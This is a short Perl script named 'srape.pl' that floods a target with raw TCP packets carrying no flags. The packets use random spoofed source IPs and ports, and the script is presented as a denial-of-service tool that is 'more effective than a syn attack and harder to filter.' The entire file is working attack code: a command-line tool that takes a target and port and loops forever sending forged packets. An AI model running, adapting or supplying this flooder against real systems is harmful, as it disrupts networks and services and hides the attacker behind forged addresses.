#!/usr/bin/perl
# srape.pl by eTech <eTech@ziplip.com>
# srape sends tcp with no flags set and causes the victim to reply with tcp/rst packets
# It seems more effective than a syn attack and harder to filter

$ARGC=@ARGV;
print "srape.pl by eTech\n";
if ($ARGC !=2) {
 print "Syntax: $0 <target> <port>\n";
 print "if port = 0. random ports\n";
		exit;
}
use Socket;
$dest_host=$ARGV[0];
$dest_port=$ARGV[1];
print "\nAttacking $dest_host on port: $dest_port\n";
for (;;) {
my $rand1 = int(rand(230)) + 1;
my $rand2 = int(rand(255));
my $rand3 = int(rand(255));
my $rand4 = int(rand(255));
$src_host = $rand1 . "." . $rand2 . "." . $rand3 . "." . $rand4;
$src_port = int(rand 65535) +1;
if ($ARGV[1] == 0)	{
$dest_port = int(rand 65535) +1;
}

ack($dest_host,$dest_port,$src_host,$src_port);

}

sub ack  {
	my ($dest_host,$dest_port,$src_host,$src_port) = @_;

	my ($PROTO_RAW) = 255; 
	my ($PROTO_IP) = 0;  
	my ($IP_HDRINCL) = 1;  

	$dest_host = (gethostbyname($dest_host))[4];
	$src_host = (gethostbyname($src_host))[4];

	socket(S, AF_INET, SOCK_RAW, $PROTO_RAW);

	setsockopt(S, $PROTO_IP, $IP_HDRINCL, 1);
		
		my ($packet) = srape($src_host, $src_port, $dest_host, $dest_port, $data);
		my ($dest) = pack('S n a4 x8', AF_INET, $dest_port, $dest_host);
		send (S,$packet,0, $dest);
	}

sub srape {
	my ($src_host, $src_port, $dest_host, $dest_port, $data) = @_;

	my $hdr_cksum = 0;  
	my $zero = 0;  
	my $proto_tcp = 6;  
	my ($tcplength) = 20; 
	my $syn = int(rand 65535) +1;  
	my $ack = 0;  
	my $tcp_4bit_hdrlen = "5"; 
	my $tcp_4bit_reserved = 0;
	my $hdr_n_reserved = $tcp_4bit_hdrlen . $tcp_4bit_reserved;  
	my $tcp_urg_bit = 0;  
	my $tcp_ack_bit = 0;  
	my $tcp_psh_bit = 0;  
	my $tcp_rst_bit = 0;  
	my $tcp_syn_bit = 0; 
	my $tcp_fin_bit = 0;  
	my $tcp_codebits = $zero . $zero . $tcp_urg_bit . $tcp_ack_bit . $tcp_psh_bit .
		$tcp_rst_bit . $tcp_syn_bit . $tcp_fin_bit;
	my $tcp_windowsize = 124;  
	my $tcp_urgent_pointer = 0;  


	my ($pseudo_tcp) = pack ('a4 a4 C C
				n n n
				N N
				H2 B8
				n v n',
			$src_host,$dest_host,$zero,$proto_tcp,
			$tcplength,$src_port,$dest_port,
			$syn,$ack,
			$hdr_n_reserved,$tcp_codebits,
			$tcp_windowsize,$zero,$tcp_urgent_pointer);

	my ($tcp_chksum) = &checkfro($pseudo_tcp);


	my $ip_version = "4";  
	my $ip_hedlen = "5";  
	my $ver_n_hlen = $ip_version . $ip_hedlen; 
	my $ip_tos = "0";  
	my ($totlength) = $tcplength + 20; 
	my $ip_fragment_id = $src_port;  
	my $ip_3bit_flags = "010"; 
	my $ip_13bit_fragoffset = "0";  
	my $ip_flags_n_frags = $ip_3bit_flags . $ip_13bit_fragoffset;
	my $ip_ttl = 255;  
	

	my ($hdr) = pack ('H2 H2 n n
		 	   B16 C2
			   n a4 a4
			   n n
			   N N
			   H2 B8
			   n v n',
		$ver_n_hlen, $ip_tos, $totlength, $ip_fragment_id,
		$ip_flags_n_frags,$ip_ttl, $proto_tcp,
		$hdr_cksum, $src_host, $dest_host,
		$src_port, $dest_port,
		$syn,$ack,
		$hdr_n_reserved,$tcp_codebits,
		$tcp_windowsize,$tcp_chksum,$tcp_urgent_pointer);

	return $hdr;
}

sub checkfro {

    my (
        $msg            
        ) = @_;
    my ($len_msg,      
        $num_short,     
        $short,        
        $chk           
        );

    $len_msg = length($msg);
    $num_short = $len_msg / 2;
    $chk = 0;
    foreach $short (unpack("S$num_short", $msg))
    {
        $chk += $short;
    }                                  
    $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
    $chk = ($chk >> 16) + ($chk & 0xffff);      
    return(~(($chk >> 16) + $chk) & 0xffff);    
}